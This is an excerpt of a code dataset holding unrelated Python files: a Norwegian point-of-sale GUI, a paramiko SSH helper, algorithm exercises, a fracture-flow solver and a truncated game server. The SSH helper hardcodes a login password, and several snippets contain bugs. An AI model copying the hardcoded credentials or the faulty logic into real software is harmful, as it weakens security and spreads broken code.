textvariable=self.hvitStringvar, width=2, command=self.hvitFunk, background=\"#ffffff\", borderwidth=borderWidth)\n\n\n #Placement\n self.funksjonButton.grid(column=0, row=0, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.endre_antallButton.grid(column=0, row=1, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.sok_artikkelButton.grid(column=0, row=2, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.prisforesporselButton.grid(column=0, row=3, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.fjern_artikkelButton.grid(column=0, row=4, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.lojalitetButton.grid(column=0, row=5, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.velikeholdButton.grid(column=0, row=7, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n \n\n def numfelt(self):\n x_margin = 5\n y_margin = 5\n x_padding = 20\n y_padding = 10\n\n tupple_y_margin = (10, 100)\n tupple_x_margin = (50, 10)\n\n rectangle_padding = 35\n\n self.numFrame = tkinter.Frame(self.keysFrame)\n self.numFrame.grid(column=0, row=0)\n\n self.actionFrame = tkinter.Frame(self.keysFrame)\n self.actionFrame.grid(column=1, row=0)\n\n self.laasButton = tkinter.Button(self.numFrame, text=\"Lås\", width=2, command=self.gjorIngenting)\n self.tilbakeButton = tkinter.Button(self.numFrame, text=\"Tilbake\", width=2, command=self.gjorIngenting)\n self.slettButton = tkinter.Button(self.numFrame, text=\"Slett\", width=2, command=self.slett)\n self.angreButton = tkinter.Button(self.numFrame, text=\"Angre\", width=2, command=self.gjorIngenting)\n\n self.numenButton = tkinter.Button(self.numFrame, text=\"1\", width=2, command=lambda: self.numpad(\"1\"), background=\"#222\", fg=\"#fff\")\n self.numtoButton = tkinter.Button(self.numFrame, text=\"2\", width=2, command=lambda: self.numpad(\"2\"), background=\"#222\", fg=\"#fff\")\n self.numtreButton = tkinter.Button(self.numFrame, text=\"3\", width=2, command=lambda: self.numpad(\"3\"), background=\"#222\", fg=\"#fff\")\n\n self.numfireButton = tkinter.Button(self.numFrame, text=\"4\", width=2, command=lambda: self.numpad(\"4\"), background=\"#222\", fg=\"#fff\")\n self.numfemButton = tkinter.Button(self.numFrame, text=\"5\", width=2, command=lambda: self.numpad(\"5\"), background=\"#222\", fg=\"#fff\")\n self.numseksButton = tkinter.Button(self.numFrame, text=\"6\", width=2, command=lambda: self.numpad(\"6\"), background=\"#222\", fg=\"#fff\")\n\n self.numsyvButton = tkinter.Button(self.numFrame, text=\"7\", width=2, command=lambda: self.numpad(\"7\"), background=\"#222\", fg=\"#fff\")\n self.numotteButton = tkinter.Button(self.numFrame, text=\"8\", width=2, command=lambda: self.numpad(\"8\"), background=\"#222\", fg=\"#fff\")\n self.numniButton = tkinter.Button(self.numFrame, text=\"9\", width=2, command=lambda: self.numpad(\"9\"), background=\"#222\", fg=\"#fff\")\n \n self.numnullButton = tkinter.Button(self.numFrame, text=\"0\", width=2, command=lambda: self.numpad(\"0\"), background=\"#222\", fg=\"#fff\")\n self.numnull_nullButton = tkinter.Button(self.numFrame, text=\"00\", width=2, command=lambda: self.numpad(\"00\"), background=\"#222\", fg=\"#fff\")\n self.numkommaButton = tkinter.Button(self.numFrame, text=\".\", width=2, command=lambda: self.numpad(\".\"), background=\"#222\", fg=\"#fff\")\n\n self.sumButton = tkinter.Button(self.actionFrame, text=\"Sum\", width=2, command=self.sumFunk)\n self.enterButton = tkinter.Button(self.actionFrame, text=\"Enter\", width=2, command=self.enterFunk)\n\n #Placement\n \n self.laasButton.grid(column=0, row=0, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.tilbakeButton.grid(column=0, row=1, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.slettButton.grid(column=0, row=2, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.angreButton.grid(column=0, row=3, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n row = 0\n self.numenButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numtoButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numtreButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numfireButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numfemButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numseksButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numsyvButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numotteButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numniButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numnullButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numnull_nullButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n\n self.numkommaButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.sumButton.grid(column=4, row=0, columnspan=1, ipadx=rectangle_padding, ipady=rectangle_padding, padx=tupple_x_margin, pady=y_margin)\n self.enterButton.grid(column=4, row=2, columnspan=1, ipadx=rectangle_padding, ipady=rectangle_padding, padx=tupple_x_margin, pady=y_margin)\n\n\n def footer(self):\n self.labelTime = tkinter.Label(self.footerFrame, text=\"Dette er en test\")\n self.exitButton = tkinter.Button(self.footerFrame, text=\"Exit fullscreen\", command=self.exitFullscreen)\n\n self.scrollUP_button = tkinter.Button(self.footerFrame, text=\"UP\", command=self.scrollUP).grid(column=2, row=0)\n \n self.openPCI_Button = tkinter.Button(self.footerFrame, text=\"Kort\", command=self.openPCI_Func)\n\n #Position\n self.labelTime.grid(column=0, row=0)\n self.exitButton.grid(column=1, row=0)\n self.openPCI_Button(column=2, row=0)\n\n # Functions\n def exitFullscreen(self):\n #self.hovedvindu.attributes('-fullscreen', False) # FULLSCREEN OFF\n self.hovedvindu.destroy()\n\n def numpad(self, num):\n self.entry.insert(tkinter.END, num)\n\n def enterKEY_Funk(self, hendelse):\n self.enterFunk()\n\n def enterFunk(self):\n artikel = self.entry.get()\n self.entry.delete(0, tkinter.END)\n print(artikel)\n\n artikel = db.searchInRecords_kassen(artikel)\n print(f\"artikel: {artikel}\")\n print(type(artikel[4]))\n if artikel:\n itemTuple = (artikel[1], artikel[3], f\"{artikel[4]}kr\")\n self.artiklerIKurv.append(artikel[4])\n self.display_treeview.insert(\"\", \"end\", value=itemTuple)\n self.treeListe = self.display_treeview.get_children()\n self.treeListLen = len(self.treeListe)\n if self.treeListLen > 1:\n textTil_antallArtikler_stringvar = \"artikler\"\n else:\n textTil_antallArtikler_stringvar = \"artikel\"\n self.antallArtikler_stringvar.set(f\"{self.treeListLen} {textTil_antallArtikler_stringvar}\")\n\n\n def slett(self):\n self.entry.delete(0, tkinter.END)\n\n def gjorIngenting(self): # Denne skal slettes\n print(\"Jeg gjør ingenting enda!\")\n\n def rodFunk(self):\n if self.state == 0:\n self.state = 1 # Funksjoner\n else:\n self.state = 0 # Tilbake til start\n\n\n self.endreFunksjonsKnapp()\n\n def gulFunk(self):\n if self.state == 1:\n self.state = 3\n\n self.endreFunksjonsKnapp()\n\n def hvitFunk(self):\n if self.state == 0:\n self.state = 2 # Betalinger\n\n self.endreFunksjonsKnapp()\n\n def endreFunksjonsKnapp(self):\n self.rodStringvar.set(\"F1\\n\" + rodListe[self.state])\n self.gronnStringvar.set(\"F2\\n\" + gronnListe[self.state])\n self.gulStringvar.set(\"F3\\n\" + gulListe[self.state])\n self.blaStringvar.set(\"F4\\n\" + blaListe[self.state])\n self.orangeStringvar.set(\"F5\\n\" + orangeListe[self.state])\n self.lillaStringvar.set(\"F6\\n\" + lillaListe[self.state])\n self.hvitStringvar.set(\"F7\\n\" + hvitListe[self.state])\n\n def sumFunk(self):\n price = 0\n for item in self.artiklerIKurv:\n price += item\n self.sumStringvar.set(f\"Sum {round(price)},-\")\n\n def selectFromTree_func1(self):\n #print(len(self.display_treeview.selection()))\n try:\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(self.treeviewID)\n print(self.treeviewID)\n self.treeviewID = 1\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(self.treeviewID)\n print(self.treeviewID)\n self.treeviewID = 0\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(\"I010\")\n print(self.treeviewID)\n except IndexError:\n pass\n\n\n\n def selectFromTree_func(self, hendelse):\n try:\n row_id = self.display_treeview.selection()[0]\n selection = self.display_treeview.set(row_id)\n # --> Selection = [\"artikelNR\", \"Artikel\", \"Pris\"]\n for item in selection:\n print(item)\n except IndexError:\n pass\n\n def scrollUP(self):\n self.treeListe\n self.currentScollPOS += 1\n try:\n row_id = 'I001' #self.display_treeview.selection()[self.currentScollPOS]\n self.display_treeview.set(row_id)\n except IndexError:\n pass\n\n #Representasjon av elementene i forhold til hvordan skrolling fungerer\n #('I001', 'I002', 'I003', 'I004', 'I005', 'I006', 'I007', 'I008', 'I009', 'I00A', 'I00B', 'I00C', 'I00D', 'I00E', 'I00F', 'I010', 'I011', 'I012', 'I013', 'I014', 'I015', 'I016', 'I017', 'I018', 'I019', 'I01A', 'I01B', 'I01C', 'I01D', 'I01E')\n\n\n \n\n #print(self.treeviewID)\n #self.display_treeview.selection_set(self.treeviewID)\n #self.display_treeview.selection_set(\"I010\")\n\n def openPCI_Func(self):\n kortbetaling\n\n\nclass Login: #INGEN LOGIKK MED BRUKENAVN OG PASSORD SKAL LAGE DATABASE!!!!!\n def __init__(self):\n self.frame = tkinter.Tk()\n\n self.title_label = tkinter.Label(self.frame, text=\"Login\").grid(column=0, row=0, columnspan=2)\n\n self.username_label = tkinter.Label(self.frame, text=\"Username: \").grid(column=0, row=1)\n self.password_label = tkinter.Label(self.frame, text=\"Password: \").grid(column=0, row=2)\n self.username = tkinter.Entry(self.frame).grid(column=1, row=1)\n self.password = tkinter.Entry(self.frame, show=\"*\").grid(column=1, row=2)\n self.button = tkinter.Button(self.frame, text=\"Login\", command=self.loginFunc).grid(column=0, row=3, columnspan=2)\n\n\n #EVENTS\n self.frame.bind('', self.loginFunc)\n\n tkinter.mainloop()\n\n\n\n\n def loginFunc(self, hendelse=0):\n self.frame.destroy()\n GuiKasse(1)\n \n\n\n\nif __name__ == \"__main__\":\n #guiKasse = GuiKasse()\n #Login()\n GuiKasse(1)\n","sub_path":"guiDatabase.py","file_name":"guiDatabase.py","file_ext":"py","file_size_in_byte":19095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238082328","text":"# datatasks\\sources\\DatabaseSource.py\nimport os\nfrom collections import OrderedDict\n\nfrom datatasks.db.DatabaseFactory import DatabaseFactory\nfrom datatasks.utils import convert_to_primary_datatypes\n\nfrom .DataSource import DataSource\n\n\nclass DatabaseSource(DataSource):\n \"\"\"\n Inherits RecordList and is capable of reading records in from a database.\n Capable of being managed by DataEntityManager. The filepath_str parameter\n is the file object for a text file containing a sql query.\n \"\"\"\n\n def __init__(self, name, db_name, filepath, **kwargs):\n self._db = DatabaseFactory().get_db(db_name)\n super().__init__(name, **kwargs)\n self.filepath = filepath\n\n def read_in(self):\n \"\"\"Reads records in from the database using the provide sql query.\"\"\"\n if self.loaded:\n return\n\n try:\n with open(self.filepath, 'r') as sql_file:\n sql_query_str = sql_file.read()\n except:\n raise FileNotFoundError('cannot read from query file')\n self.loaded = True\n for record in self._db.get_query_records(sql_query_str):\n self.load(record)\n","sub_path":"datatasks/sources/DatabaseSource.py","file_name":"DatabaseSource.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"45532453","text":"import paramiko\nimport os\n\ndef server_status():\n free_m=excute_orders(\"192.168.35.111\",\"free\")\n return free_m\n\n\n#执行命令 输入指令和ip,返回结果\ndef excute_orders(ip,cmd):\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip, 22, \"esunny\", \"123456\")\n stdin ,stdout, stderr = ssh.exec_command(cmd)\n if(stderr.read() != None):\n return stdout.read()\n ssh.close()\n return 0\n\n## 获取文件输入ip 源地址 目的地址\ndef get_file(ip,scr,des):\n if(os.path.exists(\"./192\") == False):\n os.mkdir(\"./192/\")\n t = paramiko.Transport((\"192.168.35.111\",22))\n t.connect(username=\"esunny\", password=\"123456\")\n sftp = paramiko.SFTPClient.from_transport(t)\n src = \"/home/esunny/esunny.tap\"\n des = \"192/esunny\"\n sftp.get(src,des)\n t.close()\n os._exit(0)\n return 0\n\n\n\n\n\n","sub_path":"cmdb/servers_status.py","file_name":"servers_status.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"417253131","text":"import itertools\n\ndef solve():\n\tminimum_distance = float('Inf')\n\tminimum_route = ''\n\troutes = itertools.permutations(range(2,len(Nodes)+1))\n\tfor route in routes:\n\t\tdistance = Nodes[1][route[0]] + sum(Nodes[route[i-1]][route[i]] for i in range(1, len(route)))\n\n\t\tif distance < minimum_distance:\n\t\t\tminimum_distance = distance\n\t\t\tminimum_route = route\n\n\treturn distance, route\n\n\ndef main(nodes):\n\tglobal Nodes\n\tNodes = nodes\n\n\td,r = solve()\n\tprint(d)\n\tprint(r)\n","sub_path":"Algorithms/tspBrute.py","file_name":"tspBrute.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635753693","text":"listofval=[]\nendGame=False\n\ndef end(value, list):\n if value=='':\n return True\n else:\n list.append(value)\n return False\n \nwhile endGame!=True:\n number=input(\"Please enter a number\")\n if end(number, listofval)==True:\n endGame=True\n else:\n endGame=False\nprint(listofval)\n\nfor x in range(0,len(listofval)):\n print(\"x=\", x)\n for y in range(x+1,len(listofval)):\n if int(listofval[x])>int(listofval[y]):\n z=listofval[x]\n listofval[x]=listofval[y]\n listofval[y]=z\n print(listofval)\n \n\n\n","sub_path":"BubbleSortNumberSorter.py","file_name":"BubbleSortNumberSorter.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"308632191","text":"# рассчитывается давление в трещине по модели PKN с заданным давлением на скважине ( в центре трещины) и с миним. напряжением на кончике трещины.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n l_fr0 = 0.1\n hx = 0.005\n t_step = 1\n N_fr = int(l_fr0/hx)\n nu = 0.2\n H = 0.07\n E = 3*10**9\n G = E/2/(1+nu)\n k = 4*(1-nu)*H/3.14/G\n mu = 0.1\n perm = 2*10**(-15)\n alpha = 1/12/mu/k\n Pinj = 50*10**5\n Sh = 5*10**5\n Pres = 1*10**5\n w0 = k*(Pinj - Sh) # 2*10**(-4)\n #coef = -perm/mu*(Pinj/2-Pres)/hy/2\n #q = np.ones((N_fr-1, 1))*coef\n q = np.zeros((N_fr-1, 1))\n\n T_exp = 100\n w = np.ones((N_fr - 1, 1))*k*(Sh - Sh)\n\ndef Pressure_in_frac(N_fr, t_step, alpha, w0, q, w, k, Sh):\n\n A = np.zeros((N_fr - 1, N_fr - 1))\n B = np.zeros((N_fr - 1, 1))\n for n in range(1, N_fr-2):\n w_right3 = ((w[n+1]+w[n])/2)**3\n w_left3 = ((w[n]+w[n-1])/2)**3\n A[n][n] = 1/t_step + alpha/hx*(w_right3/hx + w_left3/hx)\n A[n][n-1] = -alpha/hx*w_left3/hx\n A[n][n+1] = -alpha/hx*w_right3/hx\n\n w_right3_0 = ((w[0 + 1] + w[0]) / 2) ** 3\n w_left3_0 = ((w[0] + w0) / 2) ** 3\n A[0][0] = 1/t_step + alpha/hx*(w_right3_0/hx + w_left3_0/hx)\n A[0][1] = -alpha/hx*w_right3/hx\n\n w_right3_end = ((0 + w[N_fr-2]) / 2) ** 3\n w_left3_end = ((w[N_fr-2] + w[N_fr - 3]) / 2) ** 3\n A[N_fr-2][N_fr-2] = 1/t_step + alpha/hx*(w_right3_end/hx + w_left3_end/hx)\n A[N_fr-2][N_fr-3] = -alpha/hx*w_left3_end/hx\n\n for n in range(0, N_fr-1):\n B[n] = 1/t_step*w[n] - q[n]\n\n w_left3_another = ((w[0] + w0) / 2) ** 3\n B[0] = B[0] - (-alpha/hx*w_left3_another/hx)*w0\n\n w_new = np.linalg.solve(A,B)\n\n w = w_new.reshape(N_fr-1, 1)\n P_new = w / k + Sh\n\n return P_new, w\n\n\n\nif __name__ == '__main__':\n\n for t in range(T_exp):\n P_new, w_new = Pressure_in_frac(N_fr, t_step, alpha, w0, q, w, k, Sh)\n w = w_new\n\n print(P_new)\n print(w_new)\n fig = plt.figure()\n surf = plt.plot(P_new)\n plt.show()\n\n\n","sub_path":"flow_in_frac_simple_case.py","file_name":"flow_in_frac_simple_case.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113730272","text":"import fileinput\n\nfrom BoatNavigatorWaypoint import BoatNavigatorWaypoint\n\n\ndef process(input_list: list) -> int:\n \"\"\"\n Calculate the final manhattan distance after all instructions have been followed.\n\n :param input_list:\n :return: manhattan distance\n \"\"\"\n bn = BoatNavigatorWaypoint(input_list)\n bn.sail_away()\n print(bn.location)\n total = sum([val for val in bn.location.values() if val > 0])\n return total\n\n\nif __name__ == '__main__':\n lines = [i.strip('\\n') for i in fileinput.input()]\n print(lines[0:10])\n output = process(lines)\n print(f'Output: {output}')\n","sub_path":"src/12_2_boat_navigator_waypoint.py","file_name":"12_2_boat_navigator_waypoint.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"619076347","text":"# Given n non-negative integers a1, a2, ..., an ,\n# where each represents a point at coordinate (i, ai).\n# n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0).\n# Find two lines, which together with x-axis forms a container, such that the container contains the most water.\n#\n# Note: You may not slant the container and n is at least 2.\n\nfrom typing import List\n\n\nclass Solution:\n def max_area(self, height: List[int]) -> int:\n\n if len(height) == 2:\n return min(height)\n\n if len(height) == 3:\n return min(height) * 2\n\n else:\n left = 0\n right = len(height) - 1\n\n max_water = 0\n\n while left < right:\n max_water = max(max_water, min(height[left], height[right]) * (right - left))\n\n if height[left] < height[right]:\n left += + 1\n else:\n right -= 1\n\n return max_water\n","sub_path":"medium/ContainerWithMostWater.py","file_name":"ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"411843320","text":"# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nViewModel板块,用于View和Model之间数据交互\r\n\"\"\"\r\nfrom my_model import Cache, Settings\r\n\r\n\r\nclass ViewModel:\r\n \"\"\" ViewModel \"\"\"\r\n _cache_map = {}\r\n _cache = None\r\n _setting = None\r\n _ModelMap = {\"SCREEN_SIZE_LIST\": \"screen_size_list\",\r\n \"CONF_IMAGE_DICT\": \"conf_image_dict\",\r\n \"LOGON_SSH_DICT\": \"logon_ssh_dict\",\r\n \"SUBLOGIN_INDEX_LIST\": \"sublogin_index_list\",\r\n \"GET_INFOWIN_EVT_FLAG\": \"get_infowin_flag\",\r\n \"SET_INFOWIN_EVT_FLAG\": \"set_infowin_flag\",\r\n \"TREE_VIEW_DATA_LIST\": \"treeview_data_list\",\r\n \"PAGE_WIDGETS_DICT\": \"page_widgets_dict\",\r\n \"SERVER_CACHE_DICT\": \"server_cache_dict\",\r\n \"REFRESH_TIMER_DICT\": \"refresh_timer_dict\"}\r\n\r\n @classmethod\r\n def init(cls, settingmap):\r\n cls._cache = Cache()\r\n cls._setting = Settings()\r\n return cls._setting.init(settingmap)\r\n\r\n @classmethod\r\n def cache(cls, message, type=None, data=None):\r\n \"\"\"\r\n 数据操作;\r\n 根据消息字串映射成具体的model函数名\r\n \"\"\"\r\n if message not in cls._ModelMap:\r\n return None\r\n func_str = \"cls._cache.%s\" % cls._ModelMap[message]\r\n func = eval(func_str)\r\n\r\n if type == 'ADD':\r\n if isinstance(func, list):\r\n func.append(data)\r\n elif isinstance(func, dict):\r\n func.update(data)\r\n elif type == 'SUB':\r\n try:\r\n if isinstance(func, list):\r\n func.remove(data)\r\n elif isinstance(func, dict):\r\n func.pop(data)\r\n except:\r\n pass\r\n elif type == 'QUE':\r\n return func\r\n elif type == 'DEL':\r\n func.clear()\r\n else:\r\n return func(data)\r\n\r\n","sub_path":"my_viewmodel.py","file_name":"my_viewmodel.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"484313250","text":"st_1 = \"Spring!\"\nst_2 = '25_T_warm'\n\nin_1 = 5\nin_2 = 0\nin_3 = -10\nin_4 = 30\n\nfl_1 = 5.25\nfl_2 = -0.75\nfl_3 = 10.5\n\nn_l = [st_1,st_2,in_1,in_2,in_3,in_4,fl_1,fl_2,fl_3]\nfor i in n_l:\n print('Param =', i, ' --', type(i))\n\n\na = [in_2,in_3,in_4]\nfor i in a:\n print('Result =', in_1 > i)\n\nfor i in a:\n print('Result =', in_1 < i)\n\nfor i in a:\n print('Result =', in_1 >= i)\n\nfor i in a:\n print('Result =', in_1 <= i)\n\nfor i in a:\n print('Result =', in_1 != i)\n\n\nb = [fl_2,fl_3]\nfor i in b:\n print('Result =', fl_1 > i)\n\nfor i in b:\n print('Result =', fl_1 < i)\n\nfor i in b:\n print('Result =', fl_1 >= i)\n\nfor i in b:\n print('Result =', fl_1 <= i)\n\nfor i in b:\n print('Result =', fl_1 != i)\n\n\n\nresult_1 = in_1 == 5 and in_2 >= 0\nresult_2 = in_1 >= 5 and in_3 != -10\nresult_3 = in_4 > 15 and in_3 <= -10\nresult_4 = in_1 > 15 or in_3 <= -15\nresult_5 = in_4 < 1 or in_2 == 0\nresult_6 = in_4 != 15 or in_1 >=25\nresult_7 = not in_1 == 15\nresult_8 = not in_4 < 30 and in_2 == 0\nresult_9 = not in_1 != 5 and in_3 > 0\nresult_10 = not in_1 == 5 or not in_3 <= 10\n\nr_l =[result_1,result_2,result_3,result_4,result_5,result_6,result_7,result_8,result_9,result_10]\nfor i in r_l:\n print('result =', i)\n\n\n\nprint('Введите число:')\na = int(input())\n\nif a < 30:\n print('Вы ввели число =', a, ',', 'которое меньше 30')\nelif a > 30:\n print('Вы ввели число =', a, ',', 'которое больше 30')\nelse:\n print('Вы ввели число =', a, ',', 'которое равно 30')\n\n\n\nprint('Введите число:')\nb = int(input())\n\nimport random\nn = random.randint(1, 100)\n\nif b == n:\n print('Вы ввели число =', b, ',', 'которое равно сгенерированному числу')\nelif b > n:\n print('Вы ввели число =', b, ',', 'которое больше сгенерированного числа')\nelse:\n print('Вы ввели число =', b, ',', 'которое меньше сгенерированного числа')\n\nprint('Сгенерированное число =', n)\n\n\n\nprint('Введите число:')\nx = int(input())\n\nimport random\ny_1 = random.randint(1, 100)\ny_2 = random.randint(1, 100)\n\nif y_1 < y_2:\n if x < y_1:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированных чисел y_1 и y_2')\n elif x > y_1 and x < y_2:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированного числа y_1 и меньше сгенерированного числа y_2')\n elif x == y_1:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированному числу y_1 и меньше сгенерированного числа y_2')\n elif x == y_2:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированного числа y_1 и равно сгенерированному числу y_2')\n else:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированных чисел y_1 и y_2')\nelif y_1 > y_2:\n if x < y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированных чисел y_1 и y_2')\n elif x < y_1 and x > y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированного числа y_1 и больше сгенерированного числа y_2')\n elif x == y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированного числа y_1 и равно сгенерированному числу y_2')\n elif x == y_1:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированному числу y_1 и больше сгенерированного числа y_2')\n else:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированных чисел y_1 и y_2')\n\nelse:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированным числам y_1 и y_2')\n\nprint('Сгенерированное число y_1 =', y_1)\nprint('Сгенерированное число y_2 =', y_2)","sub_path":"Python_Home_2.py","file_name":"Python_Home_2.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179483310","text":"N = [\"1st\", \"2nd\", \"3rd\"] # 先建立字串的list等等拿來print出來\nL1 = [[0 for j in range(5)] for i in range(3)] # 列表解析裡面還有列表解析,初始值都給0\nfor i in range(3):\n print(\"The {} student:\".format(N[i]))\n for j in range(5):\n L1[i][j] = int(input()) # 有list跟處使值以後,就可以不用花費心思來建立list,可以直接輸入分數來改裡面的元素\n\nfor i in range(3):\n print(\"Student %d\" % (i + 1))\n print(\"#Sum %d\" % (sum(L1[i])))\n print(\"#Average %.2f\" % (sum(L1[i]) / 5))","sub_path":"_6_list/607/reference_solution.py","file_name":"reference_solution.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66943810","text":"import numpy as np\nimport cv2\nimport sys, os\nimport copy\nfrom utils.contour import ensure_3D_contour, to_2D_contour\n\n\nclass Filter:\n def __init__(self):\n self.conf_section = None\n self.conf_file = None\n self.icon = None\n\n def meta(self):\n return {\n \"filter\": self.conf_section,\n \"name\": \"Origin Contour\",\n \"description\": \"Moves the contour to the center point [0,0]\",\n \"parameters\": [],\n \"input\": \"contour\",\n \"output\": \"contour\",\n \"icon\": self.icon\n }\n\n def configure(self, global_conf, conf_section, conf_file):\n self.conf_section = conf_section\n self.conf_file = conf_file\n\n def process(self, image, cnt_3d):\n if len(cnt_3d) > 0:\n cnt = to_2D_contour(cnt_3d)\n # Determine the bounding rectangle of all contours\n x, y, w, h = cv2.boundingRect(np.concatenate(cnt))\n image_height, image_width = image.shape[0], image.shape[1]\n\n # the offset to move the center of the contour to [0,0]\n offset_x = int(w / 2 + x)\n offset_y = int(h / 2 + y)\n\n cnt_3d = [np.subtract(c, [offset_x, offset_y, 0], dtype=np.int32) for c in cnt_3d]\n\n # shift the contour to the center. Only required for the drawing\n #\n w2 = int(image_width / 2)-offset_x\n h2 = int(image_height / 2)-offset_y\n drawing_cnt = [np.subtract(c, [-w2, -h2], dtype=np.int32) for c in cnt]\n newimage = np.zeros(image.shape, dtype=\"uint8\")\n newimage.fill(255)\n\n # draw the coordinate system of the centered drawing contour\n x, y, w, h = cv2.boundingRect(np.concatenate(drawing_cnt))\n cv2.drawContours(newimage, drawing_cnt, -1, (60, 169, 242), 1)\n # horizontal\n cv2.line(newimage, (x + int(w / 2), y + int(h / 2)), (x + w, y + int(h / 2)), (255, 0, 0), 1)\n # vertical\n cv2.line(newimage, (x + int(w / 2), y), (x + int(w / 2), y + int(h / 2)), (0, 0, 255), 1)\n\n image = newimage\n\n return image, cnt_3d\n\n def stop(self):\n pass\n","sub_path":"src/processing/contours/origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236995042","text":"def printAverage(scores):\n print(\"The average test score is %d\"%(sum(scores)/len(scores)))\n\n\n# returns a list of scores entered by the user\ndef enterScores(numStudents):\n return [int(raw_input(\"Enter their score: \")) for i in range(numStudents)]\n\n\nfrom enterScores import enterScores\nfrom printAverage import printAverage\n\ndef main():\n while (True):\n numStudents = int(raw_input(\"How many students took the test: \"))\n scores = enterScores(numStudents)\n printAverage(scores)\n end = raw_input(\"Do you want to end program? (Enter no to process a new set of scores): \")\n if end == \"yes\":\n break\n\n\nmain()","sub_path":"2017 Fall/SODV1101 Programming/pf_fall2017_pa4/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262159207","text":"import asyncio\nimport json\nimport uuid\nfrom asyncio import CancelledError\n\nimport aiohttp\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.web_response import Response\n\nfrom server.communication.network_player import NetworkPlayer\nfrom server.communication.session import ServerSession\nfrom server.gomokulogic.game_player import GamePlayer\nfrom server.gomokulogic.gomoku import GameState, GomokuGameLogicManager, GameException\n\n\nasync def game_join(request):\n session = ServerSession.get_instance()\n auth_obj = BasicAuth.decode(request.headers['Authorization'])\n current_user = await session.validate_user_credentials(auth_obj.login, auth_obj.password)\n game_idn = request.match_info['game_idn']\n game = await session.get_game(game_idn)\n\n ws = web.WebSocketResponse()\n await ws.prepare(request)\n me = NetworkPlayer(ws, current_user['username'])\n\n if game.player1 is None:\n me.player_id = 